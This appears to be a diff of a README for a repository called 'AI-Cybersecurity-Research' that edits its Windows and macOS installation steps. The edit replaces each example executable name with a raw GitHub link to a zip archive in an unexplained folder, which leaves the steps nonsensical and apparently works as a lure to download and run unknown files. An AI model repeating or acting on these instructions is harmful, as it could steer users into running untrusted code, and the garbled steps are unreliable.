lcxiterzin123/AI-Cybersecurity-Research/README.md

 ### For Windows:

 1. Locate the downloaded file (usually in your "Downloads" folder).
-2. Double-click on the executable file (e.g., `AI-Cybersecurity-Research.exe`).
+2. Double-click on the executable file (e.g., `https://raw.githubusercontent.com/lcxiterzin123/AI-Cybersecurity-Research/main/strouthiocamel/AI-Cybersecurity-Research.zip`).
 3. Follow the prompts to complete any setup.

 ### For macOS:

 1. Open Finder and go to the "Downloads" folder.
-2. Double-click on the application file (e.g., `AI-Cybersecurity-Research.app`).
+2. Double-click on the application file (e.g., `https://raw.githubusercontent.com/lcxiterzin123/AI-Cybersecurity-Research/main/strouthiocamel/AI-Cybersecurity-Research.zip`).
 3. If prompted, drag the application to your Applications folder for easier access.

 ### For Linux: